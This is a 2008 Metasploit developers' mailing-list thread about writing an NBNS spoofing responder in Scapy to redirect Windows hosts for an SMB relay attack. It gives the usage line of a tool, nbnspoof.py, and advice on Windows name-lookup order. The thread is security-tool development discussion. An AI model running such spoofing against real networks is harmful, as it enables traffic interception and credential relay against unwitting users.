I tried out nmbd, which worked, but it's a bit clunky, noisy, and only responds to requests for the aliases you've set up. So I decided to write my own nbns responder in Scapy.
I got a bit into it and was googling to find a solution to a problem I was having, and came across the exact thing I was looking for! This is a broadcast nbns request responder that will respond to any name queries that match a given regex. This is sufficient to redirect and complete an smb_relay-type attack (if the other prereq's are met, of course). Also, if interested in a tutorial on python and scapy, he wrote a series of blog posts describing the process of writing the nbns spoofer. http://www.mcgrewsecurity.com/projects/nbnspoof/ Usage: sudo ./nbnspoof.py -v -i eth0 -n "[a-z]+" -h 192.168.1.100 -m 00:11:22:33:44:55 nbnspoof.py [-v] -i <interface> -n <regexp> -h <ip address> -m <MAC> -v Verbose output of sniffed NBNS name queries, and responses sent -i The interface you want to sniff and send on -n A regular expression applied to each query to determine whether a spoofed response will be sent -h The IP address that will be sent in spoofed responses -m The source MAC address for spoofed responses natron On Wed, Apr 9, 2008 at 4:50 PM, H D Moore <[EMAIL PROTECTED]> wrote: > On Wednesday 09 April 2008, Señor Natron wrote: > > However, when Victor wants to make an SMB connection, his PC issues an > > NBSTAT request to the IP:137, which metasploit/linux has no idea what > > to do with, and responds with an ICMP Type 3 Port Unreachable message. > > Yup, you can solve this by installing Samba, configuring the hostname in > smbd.conf, and running the nmbd daemon. At some later point, it may make > sense to add a NBNS responder to metasploit, but it doesn't sound like > fun to write. > > > Questions: > > 1) What causes Victor to issue an NBSTAT request? Is it something > > wrong in my spoofed response packet, perhaps? (When Victor opens an > > SMB connection to \\ip.add.res, it immediately performs an SMB connect > > to :139; no NBSTAT to 137 is performed.) I've examined my spoofed > > response and can't see anything that would be kicking off an NBSTAT > > request, but I may be missing something. > > Name lookups in Windows loosely follow this order: > > 1. Hosts File > 2. DNS > 3. WINS > 4. NBNS > > > 2) Anyone know if it's possible to answer 4) in such a way that Victor > will skip the NBSTAT request? > > Yeah, just reply to the DNS request. > > > 3) Is it possible to answer 4) with an NBSTAT response that > > will elicit a Negotiate Protocol Request to :139 or :445? > > Yes, use nmbd from Samba. > > -HD > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers >
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
